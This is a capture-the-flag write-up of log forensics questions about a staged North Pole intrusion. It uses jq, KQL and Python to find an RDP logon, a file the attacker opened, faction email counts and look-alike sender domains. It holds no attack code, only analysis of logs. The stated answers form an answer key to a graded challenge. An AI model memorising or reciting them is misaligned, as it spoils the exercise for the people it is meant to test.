  "SubjectUserSid": "S-1-5-18",
  "SubjectUserName": "DC01$",
  "SubjectDomainName": "NORTHPOLE",
  "SubjectLogonId": "0x3e7",
  "TargetUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1112",
  "TargetUserName": "nutcrakr",
  "TargetDomainName": "NORTHPOLE",
  "TargetLogonId": "0xdd425e",
  "LogonType": 10,
  "LogonProcessName": "User32 ",
  "AuthenticationPackageName": "Negotiate",
  "WorkstationName": "DC01",
  "LogonGuid": "{00000000-0000-0000-0000-000000000000}",
  "TransmittedServices": "-",
  "LmPackageName": "-",
  "KeyLength": 0,
  "ProcessName": "C:\\Windows\\System32\\svchost.exe",
  "IpAddress": "10.12.25.24",
  "IpPort": 0,
  "ImpersonationLevel": "%%1833",
  "RestrictedAdminMode": "%%1843",
  "TargetOutboundUserName": "-",
  "TargetOutboundDomainName": "-",
  "VirtualAccount": "%%1843",
  "TargetLinkedLogonId": "0xdd41af",
  "ElevatedToken": "%%1843",
  "EventReceivedTime": "2024-09-16T11:35:57-04:00",
  "SourceModuleName": "inSecurityEvent",
  "SourceModuleType": "im_msvistalog",
  "Subject_SecurityID": "S-1-5-18",
  "Subject_AccountName": "DC01$",
  "Subject_AccountDomain": "NORTHPOLE",
  "Subject_LogonID": "0x3E7",
  "LogonInformation_LogonType": 10,
  "LogonInformation_RestrictedAdminMode": "No",
  "LogonInformation_VirtualAccount": "No",
  "LogonInformation_ElevatedToken": "No",
  "NewLogon_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1112",
  "NewLogon_AccountName": "nutcrakr",
  "NewLogon_AccountDomain": "NORTHPOLE",
  "NewLogon_LogonID": "0xDD425E",
  "NewLogon_LinkedLogonID": "0xDD41AF",
  "NewLogon_NetworkAccountName": "-",
  "NewLogon_NetworkAccountDomain": "-",
  "NewLogon_LogonGUID": "{00000000-0000-0000-0000-000000000000}",
  "ProcessInformation_ProcessID": "0x994",
  "ProcessInformation_ProcessName": "C:\\Windows\\System32\\svchost.exe",
  "NetworkInformation_WorkstationName": "DC01",
  "NetworkInformation_SourceNetworkAddress": "10.12.25.24",
  "NetworkInformation_SourcePort": 0,
  "DetailedAuthenticationInformation_LogonProcess": "User32",
  "DetailedAuthenticationInformation_AuthenticationPackage": "Negotiate",
  "DetailedAuthenticationInformation_TransitedServices": "-",
  "DetailedAuthenticationInformation_PackageNameNTLMonly": "-",
  "DetailedAuthenticationInformation_KeyLength": 0,
  "MoreDetails": "An account was successfully logged on.\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\nThe authentication information fields provide detailed information about this specific logon request.\n- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n- Transited services indicate which intermediate services have participated in this logon request.\n- Package name indicates which sub-protocol was used among the NTLM protocols.\n- Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
}

In KQL, the query is event_source: "WindowsEvent" and event.EventID: 4624 and event.LogonType: 10.

The EventTime field is local time (UTC-4, matching the -04:00 offsets elsewhere in the log), so I’ll add four hours and format it as an ISO8601 UTC timestamp.

Answer: 2024-09-16T15:35:57.000Z

Question 20

The attacker is trying to create their own naughty and nice list! What is the full file path they created using their remote desktop connection?

I’m looking for file creation events on the DC (where the RDP session is), but searching for Sysmon event 11 doesn’t find anything useful.

I’ll look at process creation events (Sysmon event 1) for nutcrakr on the DC after the RDP login. The .EventTime field is in local time, so I subtract four hours from the UTC answer above to get the 11:35:57 cutoff:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq '. | select(.EventID == 1 and .Hostname == "dc01.northpole.local" and .User == "NORTHPOLE\\nutcrakr" and .EventTime > "2024-09-16 11:35:56") | "[\(.EventTime)] \(.CommandLine) - \(.ParentCommandLine)"'
"[2024-09-16 11:35:59] C:\\Windows\\system32\\TSTheme.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:35:59] rdpclip - C:\\Windows\\System32\\svchost.exe -k termsvcs -s TermService"
"[2024-09-16 11:35:59] sihost.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s UserManager"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s CDPUserSvc - C:\\Windows\\system32\\services.exe"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup -s WpnUserService - C:\\Windows\\system32\\services.exe"
"[2024-09-16 11:35:59] taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] taskhostw.exe USER - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] taskhostw.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\ServerManagerLauncher.exe - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:35:59] C:\\Windows\\system32\\userinit.exe - winlogon.exe"
"[2024-09-16 11:36:00] C:\\Windows\\Explorer.EXE - C:\\Windows\\system32\\userinit.exe"
"[2024-09-16 11:36:00] C:\\Windows\\System32\\smartscreen.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:01] \"C:\\Windows\\System32\\unregmp2.exe\" /FirstLogon - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:01] \"C:\\Windows\\System32\\ie4uinit.exe\" -UserConfig - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:01] C:\\Windows\\System32\\ie4uinit.exe -ClearIconCache - \"C:\\Windows\\System32\\ie4uinit.exe\" -UserConfig"
"[2024-09-16 11:36:01] rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh - C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc"
"[2024-09-16 11:36:01] \"ctfmon.exe\" - C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted -p -s TabletInputService"
"[2024-09-16 11:36:01] C:\\Windows\\system32\\RunDll32.exe C:\\Windows\\system32\\migration\\WininetPlugin.dll,MigrateCacheForUser /m /0 - C:\\Windows\\System32\\ie4uinit.exe -ClearIconCache"
"[2024-09-16 11:36:02] \"C:\\Windows\\System32\\unregmp2.exe\" /FirstLogon - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:03] \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Windows\\System32\\iesetup.dll\",IEHardenAdmin - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:03] \"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Windows\\System32\\iesetup.dll\",IEHardenUser - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:05] \"C:\\Windows\\system32\\ServerManager.exe\"  - C:\\Windows\\system32\\ServerManagerLauncher.exe"
"[2024-09-16 11:36:05] \"C:\\Windows\\system32\\ServerManager.exe\"  - C:\\Windows\\system32\\ServerManagerLauncher.exe"
"[2024-09-16 11:36:06] C:\\Windows\\system32\\SettingSyncHost.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:07] \"C:\\Windows\\System32\\fsquirt.exe\" -Register - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:17] \"C:\\Windows\\System32\\SecurityHealthSystray.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:17] \"C:\\Windows\\System32\\vm3dservice.exe\" -u - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:18] \"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:23] C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:36:28] \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\WishLists\\santadms_only\\its_my_fakelst.txt - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:36:35] rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh - C:\\Windows\\system32\\svchost.exe -k wsappx -p -s AppXSvc"
"[2024-09-16 11:38:10] \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:40:09] C:\\Windows\\system32\\ApplicationFrameHost.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:41:38] \"C:\\Users\\nutcrakr\\Desktop\\getthelist\\howtosavexmas.pdf.exe\"  - C:\\Windows\\Explorer.EXE"
"[2024-09-16 11:46:17] C:\\Windows\\system32\\TSTheme.exe -Embedding - C:\\Windows\\system32\\svchost.exe -k DcomLaunch -p"
"[2024-09-16 11:46:17] taskhostw.exe KEYROAMING - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"
"[2024-09-16 11:51:00] taskhostw.exe Install $(Arg0) - C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule"

A lot of these at the top are the RDP session starting. Then there’s this:

"[2024-09-16 11:36:28] \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\WishLists\\santadms_only\\its_my_fakelst.txt - C:\\Windows\\Explorer.EXE"

It’s notepad.exe opening its_my_fakelst.txt, and the command line gives the full path.

Answer: C:\WishLists\santadms_only\its_my_fakelst.txt
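The same lookups without jq, as an added Python example of mine (not the writeup’s commands or the challenge files): it parses the syslog-wrapped JSON format, finds the earliest 2889 bind by its own timestamp rather than file order (Question 14), converts the LogonType 10 logon’s local EventTime to the ISO8601 UTC form the answer wants (Question 19), and lists the user’s process creations on the DC from that logon onward (Question 20). The host name "siem" and all log lines are constructed and carry only the fields the functions use.

```python
"""Parse the syslog-wrapped JSON lines of WindowsEvent.log and pull out the
event-lookup and timestamp answers. Added example for this writeup, not part
of the challenge files; the log lines are constructed and carry only the
fields the functions use."""
import json
from datetime import datetime, timedelta, timezone

# The logs carry -04:00 offsets, so that is the zone the bare EventTime values are in.
LOCAL_TZ = timezone(timedelta(hours=-4))
EVENT_TIME_FMT = "%Y-%m-%d %H:%M:%S"

# Constructed sample in the log's shape: "<PRI>1 <timestamp> <host> <source> - - - <json>",
# seven space-separated header fields and then the JSON body (what `cut -d' ' -f8-` keeps).
# The two 2889 binds are deliberately out of time order to show why sorting matters.
SAMPLE_LOG = r"""
<134>1 2024-09-16T11:10:13-04:00 siem WindowsEvent - - - {"EventID": 2889, "Computer": "dc01.northpole.local", "ClientIPaddress": "172.24.25.22:18599", "UserID": "elf_user@northpole.local", "Date": "2024-09-16T11:10:13-04:00"}
<134>1 2024-09-16T11:10:12-04:00 siem WindowsEvent - - - {"EventID": 2889, "Computer": "dc01.northpole.local", "ClientIPaddress": "172.24.25.22:18598", "UserID": "elf_user@northpole.local", "Date": "2024-09-16T11:10:12-04:00"}
<134>1 2024-09-16T11:30:01-04:00 siem WindowsEvent - - - {"EventTime": "2024-09-16 11:30:01", "Hostname": "dc01.northpole.local", "EventID": 4624, "TargetUserName": "nutcrakr", "LogonType": 3, "IpAddress": "10.12.25.24"}
<134>1 2024-09-16T11:35:57-04:00 siem WindowsEvent - - - {"EventTime": "2024-09-16 11:35:57", "Hostname": "dc01.northpole.local", "EventID": 4624, "TargetUserName": "nutcrakr", "LogonType": 10, "IpAddress": "10.12.25.24"}
<134>1 2024-09-16T11:20:00-04:00 siem WindowsEvent - - - {"EventTime": "2024-09-16 11:20:00", "Hostname": "dc01.northpole.local", "EventID": 1, "User": "NORTHPOLE\\nutcrakr", "CommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"}
<134>1 2024-09-16T11:36:28-04:00 siem WindowsEvent - - - {"EventTime": "2024-09-16 11:36:28", "Hostname": "dc01.northpole.local", "EventID": 1, "User": "NORTHPOLE\\nutcrakr", "CommandLine": "\"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\WishLists\\santadms_only\\its_my_fakelst.txt", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"}
<134>1 2024-09-16T11:40:00-04:00 siem WindowsEvent - - - {"EventTime": "2024-09-16 11:40:00", "Hostname": "SleighRider.northpole.local", "EventID": 1, "User": "NORTHPOLE\\nutcrakr", "CommandLine": "notepad.exe", "ParentCommandLine": "C:\\Windows\\Explorer.EXE"}
"""


def parse_line(line):
    """Drop the seven header fields and decode the JSON body."""
    parts = line.split(" ", 7)
    if len(parts) < 8:
        raise ValueError(f"not a syslog+JSON line: {line[:40]!r}")
    return json.loads(parts[7])


def load_events(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def first_event(events, event_id, time_field="Date"):
    """Earliest event with this ID by its own timestamp, not by position in the file."""
    matches = [e for e in events if e.get("EventID") == event_id]
    if not matches:
        return None
    return min(matches, key=lambda e: datetime.fromisoformat(e[time_field]))


def event_time_to_utc_iso(event_time, local_tz=LOCAL_TZ):
    """'2024-09-16 11:35:57' (local, no offset) -> '2024-09-16T15:35:57.000Z'."""
    local = datetime.strptime(event_time, EVENT_TIME_FMT).replace(tzinfo=local_tz)
    return local.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%S.000Z")


def rdp_logons(events):
    """Successful logons (4624) whose LogonType is 10 (RemoteInteractive, i.e. RDP)."""
    return [e for e in events if e.get("EventID") == 4624 and e.get("LogonType") == 10]


def processes_after(events, host, user, start_event_time):
    """Sysmon process creations (EventID 1) on `host` by `user` at or after
    `start_event_time`, oldest first, as (EventTime, CommandLine) pairs.
    Times are compared as datetimes rather than strings so the cutoff is exact."""
    cutoff = datetime.strptime(start_event_time, EVENT_TIME_FMT)
    hits = [e for e in events
            if e.get("EventID") == 1 and e.get("Hostname") == host and e.get("User") == user
            and datetime.strptime(e["EventTime"], EVENT_TIME_FMT) >= cutoff]
    hits.sort(key=lambda e: e["EventTime"])
    return [(e["EventTime"], e["CommandLine"]) for e in hits]


if __name__ == "__main__":
    events = load_events(SAMPLE_LOG)
    bind = first_event(events, 2889)
    print("first unsigned LDAP bind:", bind["Date"], "from", bind["ClientIPaddress"])
    rdp = rdp_logons(events)[0]
    print("RDP logon (UTC):", event_time_to_utc_iso(rdp["EventTime"]))
    for when, cmd in processes_after(events, rdp["Hostname"], "NORTHPOLE\\nutcrakr", rdp["EventTime"]):
        print(f"[{when}] {cmd}")
```

Against the real WindowsEvent.log, replace SAMPLE_LOG with the file contents; the header split is the same as the `cut -d' ' -f8-` used throughout.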

Questions 21-24

Question 21

The Wombley faction has user accounts in our environment. How many unique Wombley faction users sent an email message within the domain?

I need a way to identify what makes a “Wombley faction user”. I’ll note I’m looking for “from” addresses here.

There are 571 unique from addresses:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.From' | sort -u | wc -l
571

If I filter to just get the @northpole.local emails, it drops to 21:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.From | endswith("@northpole.local")) | .From' | sort -u | wc -l
21
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.From | endswith("@northpole.local")) | .From' | sort -u 
asnowball04@northpole.local
asnowball_05@northpole.local
asnowball08@northpole.local
asnowball09@northpole.local
elf_user00@northpole.local
elf_user01@northpole.local
elf_user02@northpole.local
elf_user03@northpole.local
elf_user04@northpole.local
elf_user05@northpole.local
elf_user06@northpole.local
elf_user07@northpole.local
elf_user08@northpole.local
elf_user09@northpole.local
elf_user10@northpole.local
elf_user11@northpole.local
kriskring1e@northpole.local
wcub101@northpole.local
wcub303@northpole.local
wcub808@northpole.local
wcube311@northpole.local

There are four users with emails starting with “wcub”, which solves the question.

Answer: 4

Question 22

The Alabaster faction also has some user accounts in our environment. How many emails were sent by the Alabaster users to the Wombley faction users?

From the analysis above, it seems like Alabaster users likely start with “asnowball”. jq can handle this:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select((.From | startswith("asnowball")) and (.To | startswith("wcub")))' | wc -l
22
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select((.From | startswith("asnowball")) and (.To | startswith("wcub"))) | "\(.From) --> \(.To): \(.Subject)"'
asnowball_05@northpole.local --> wcub303@northpole.local: Travel Arrangements - Urgent
asnowball_05@northpole.local --> wcub808@northpole.local: Performance Reviews and Development Opportunities
asnowball_05@northpole.local --> wcube311@northpole.local: Health and Safety Updates: Ensuring a Secure Work Environment
asnowball09@northpole.local --> wcub808@northpole.local: Urgent Supply Chain Update
asnowball08@northpole.local --> wcub303@northpole.local: Training Opportunities at The North Pole
asnowball09@northpole.local --> wcub808@northpole.local: Upcoming Meeting Schedules - Action Required
asnowball09@northpole.local --> wcub303@northpole.local: Office Relocations Update
asnowball09@northpole.local --> wcube311@northpole.local: Retirement Announcements
asnowball08@northpole.local --> wcube311@northpole.local: Market Trends Update
asnowball08@northpole.local --> wcub303@northpole.local: Office Relocations Update
asnowball09@northpole.local --> wcub303@northpole.local: Urgent Supply Chain Update
asnowball04@northpole.local --> wcub101@northpole.local: Inventory Levels Update
asnowball09@northpole.local --> wcub808@northpole.local: Inventory Levels Update
asnowball09@northpole.local --> wcub808@northpole.local: Access Request Approval
asnowball08@northpole.local --> wcub808@northpole.local: Inventory Levels Update
asnowball04@northpole.local --> wcub101@northpole.local: No Subject
asnowball09@northpole.local --> wcub101@northpole.local: No Subject
asnowball_05@northpole.local --> wcub808@northpole.local: Budget Approvals
asnowball09@northpole.local --> wcub808@northpole.local: Re: Sustainability Initiatives at The North Pole
asnowball08@northpole.local --> wcub101@northpole.local: Team Assignments
asnowball08@northpole.local --> wcub101@northpole.local: Christmas Wish List Analysis and Insights
asnowball04@northpole.local --> wcube311@northpole.local: Office Relocations Update

Answer: 22

Question 23

Of all the reindeer, there are only nine. What’s the full domain for the one whose nose does glow and shine? To help you narrow your search, search the events in the ‘SnowGlowMailPxy’ event source.

I’ll look at users where “rudolph” is in the sender:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -rc '. | select(.From | ascii_downcase | contains("rudolph")) | "\(.From) --> \(.To): \(.Subject)"'
RudolphRunner@gingerlane.dancer --> asnowball09@northpole.local: Upcoming Software Updates
RudolphRunner@pr4nc3r.trot --> asnowball09@northpole.local: Welcome to The North Pole - New Hire Introductions
RudolphRunner@evergreen.tree --> wcube311@northpole.local: Budget Approvals Request
RudolphRunner@blizzard.north --> elf_user10@northpole.local: Access Request for [recipient]
RudolphRunner@pine.tree --> asnowball08@northpole.local: Office Relocation Update
RudolphRunner@nogfest.eggnog --> asnowball08@northpole.local: Christmas Wish List Analysis
RudolphRunner@stocking.chimney --> asnowball08@northpole.local: Team Assignments for Project X
RudolphRunner@snowdrift.globe --> elf_user00@northpole.local: Regulatory Compliance Update
RudolphRunner@sleigh.ride --> elf_user03@northpole.local: Access Request for [recipient]
RudolphRunner@santa.hut --> elf_user07@northpole.local: No Subject
RudolphRunner@reindeers.fly --> elf_user09@northpole.local: Diversity and Inclusion Initiatives
RudolphRunner@candycane.factory --> asnowball08@northpole.local: Upcoming Competitor Analysis - Your Valuable Insights Requested
RudolphRunner@wicked.snow --> elf_user04@northpole.local: Team Assignments - Urgent
RudolphRunner@bells.ring --> wcub101@northpole.local: Policy Changes at The North Pole
RudolphRunner@mistlebranch.vixen --> asnowball09@northpole.local: Office Relocations Update
RudolphRunner@rud01ph.glow --> elf_user05@northpole.local: Diversity and Inclusion Initiatives at The North Pole
RudolphRunner@cheery.fireplace --> elf_user00@northpole.local: No Subject

The second to last one has “rud01ph” in the domain, and that’s it.

Answer: rud01ph.glow

Question 24

With a fiery tail seen once in great years, what’s the domain for the reindeer who flies without fears? To help you narrow your search, search the events in the ‘SnowGlowMailPxy’ event source.

According to Wikipedia, Fearless is one of the ten reindeer in L. Frank Baum’s “The Life and Adventures of Santa Claus”. But there’s no sign of a reindeer named Fearless in the data, and the previous question said explicitly there are nine.

The “fiery tail” sounds like Comet. I’ll look at the sending domains:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.From' | cut -d'@' -f2 | sort -u
bells.ring
blizzard.north
c0m3t.halleys
candycane.factory
cheery.fireplace
elf.toyshop
evergreen.tree
frosty.north
gingerbread.house
gingerlane.dancer
ginger.snap
holly.jolly
icicle.light
jolly.jingle
merry.elves
mistlebranch.vixen
nogfest.eggnog
northpole.local
northstar.nibbles
nutcracker.tale
pine.tree
pr4nc3r.trot
reindeer.corral
reindeers.fly
rud01ph.glow
santa.hut
sleigh.ride
snowdrift.globe
snowflakekingdom.chill
snowflake.spark
snowy.land
starlight.tree
stocking.chimney
tinsel.town
tinsel.wrap
toytinkers.land
twilight.star
twinkle.light
wicked.snow
wreath.maker
yule.log

Towards the top is c0m3t.halleys.

Answer: c0m3t.halleys
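A Python version of the faction and reindeer queries from Questions 21 through 24, as an added example of mine rather than the writeup’s own commands: it groups in-domain senders by the prefixes observed above, counts mail between factions, and searches sender domains after folding digits back to letters, so rud01ph, c0m3t and pr4nc3r match their reindeer. The mail lines are constructed, and the Comet@c0m3t.halleys sender is made up since the page only shows that domain.

```python
"""Parse SnowGlowMailPxy.log and tally mail by faction, then search sender
domains with leetspeak folded back to letters. Added example for this writeup,
not part of the challenge files; the mail lines are constructed and the
"Comet@c0m3t.halleys" sender is made up (the page only shows the domain)."""
import json
from collections import Counter

DOMAIN = "northpole.local"
# Local-part prefixes that identify each faction, as observed in the sender list above.
FACTIONS = {"Alabaster": "asnowball", "Wombley": "wcub"}
# Digit-for-letter substitutions seen in the reindeer domains (rud01ph, c0m3t, pr4nc3r).
LEET = str.maketrans("013457", "oleast")

# Constructed sample: seven syslog header fields, then the JSON body.
SAMPLE_MAIL_LOG = r"""
<134>1 2024-09-16T09:00:01-04:00 mailpxy SnowGlowMailPxy - - - {"From": "asnowball09@northpole.local", "To": "wcub808@northpole.local", "Subject": "Urgent Supply Chain Update"}
<134>1 2024-09-16T09:02:10-04:00 mailpxy SnowGlowMailPxy - - - {"From": "asnowball_05@northpole.local", "To": "wcub303@northpole.local", "Subject": "Travel Arrangements - Urgent"}
<134>1 2024-09-16T09:05:44-04:00 mailpxy SnowGlowMailPxy - - - {"From": "asnowball09@northpole.local", "To": "wcub808@northpole.local", "Subject": "Access Request Approval"}
<134>1 2024-09-16T09:07:13-04:00 mailpxy SnowGlowMailPxy - - - {"From": "wcub101@northpole.local", "To": "asnowball04@northpole.local", "Subject": "Re: Inventory Levels Update"}
<134>1 2024-09-16T09:09:30-04:00 mailpxy SnowGlowMailPxy - - - {"From": "elf_user00@northpole.local", "To": "wcub101@northpole.local", "Subject": "No Subject"}
<134>1 2024-09-16T09:11:02-04:00 mailpxy SnowGlowMailPxy - - - {"From": "RudolphRunner@rud01ph.glow", "To": "elf_user05@northpole.local", "Subject": "Diversity and Inclusion Initiatives at The North Pole"}
<134>1 2024-09-16T09:12:48-04:00 mailpxy SnowGlowMailPxy - - - {"From": "RudolphRunner@gingerlane.dancer", "To": "asnowball09@northpole.local", "Subject": "Upcoming Software Updates"}
<134>1 2024-09-16T09:14:05-04:00 mailpxy SnowGlowMailPxy - - - {"From": "RudolphRunner@pr4nc3r.trot", "To": "asnowball09@northpole.local", "Subject": "Welcome to The North Pole - New Hire Introductions"}
<134>1 2024-09-16T09:15:21-04:00 mailpxy SnowGlowMailPxy - - - {"From": "Comet@c0m3t.halleys", "To": "elf_user01@northpole.local", "Subject": "No Subject"}
"""


def parse_line(line):
    """Drop the seven syslog header fields (like `cut -d' ' -f8-`) and decode the JSON."""
    return json.loads(line.split(" ", 7)[7])


def load_mails(text):
    return [parse_line(line) for line in text.splitlines() if line.strip()]


def faction_of(address, factions=FACTIONS, domain=DOMAIN):
    """'Alabaster' / 'Wombley' / 'Other' for in-domain addresses, None for outside senders."""
    local, _, dom = address.partition("@")
    if dom != domain:
        return None
    for name, prefix in factions.items():
        if local.startswith(prefix):
            return name
    return "Other"


def unique_senders_by_faction(mails):
    """How many distinct in-domain addresses from each faction sent at least one message."""
    seen = {}
    for m in mails:
        faction = faction_of(m["From"])
        if faction is not None:
            seen.setdefault(faction, set()).add(m["From"])
    return {faction: len(addrs) for faction, addrs in seen.items()}


def faction_traffic(mails):
    """Message counts keyed by (sender faction, recipient faction), in-domain only."""
    pairs = ((faction_of(m["From"]), faction_of(m["To"])) for m in mails)
    return Counter(p for p in pairs if None not in p)


def deleet(text):
    """Fold digit substitutions back to letters: 'rud01ph' -> 'rudolph'."""
    return text.lower().translate(LEET)


def sender_domains_matching(mails, word):
    """Sender domains that contain `word` once leetspeak is folded out."""
    domains = {m["From"].partition("@")[2] for m in mails}
    return sorted(d for d in domains if word in deleet(d))


if __name__ == "__main__":
    mails = load_mails(SAMPLE_MAIL_LOG)
    print("unique senders:", unique_senders_by_faction(mails))
    print("Alabaster -> Wombley:", faction_traffic(mails)[("Alabaster", "Wombley")])
    for reindeer in ("rudolph", "comet", "prancer"):
        print(reindeer, "->", sender_domains_matching(mails, reindeer))
```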

image-20250103115629202

Outro

Fitzy is shocked:

Fitzy Shortstack


Unbelievable! You dissected the attack chain using advanced analysis—impressive work! With determination like yours, we might just fix the mess and get Santa smiling again.

Bravo! You pieced it all together, uncovering the attack path. Santa’s gonna be grateful for your quick thinking and tech savviness. The North Pole owes you big time!

Santa is relieved as well:

Santa


Wonderful! Now we have a much better idea of how that pesky ransomware made its way onto the file share. We’re one step closer to getting the Naughty-Nice List back.

Alabaster is amazed:

Alabaster Snowball


You continue to amaze! Now that you’ve investigated with Elf Stack and solved the case, we’re one step closer to recovering the Naughty-Nice List.

Wombley warns there’s more to come:

Wombley Cube


Great work, but successfully investigating our attack chain is only the first step.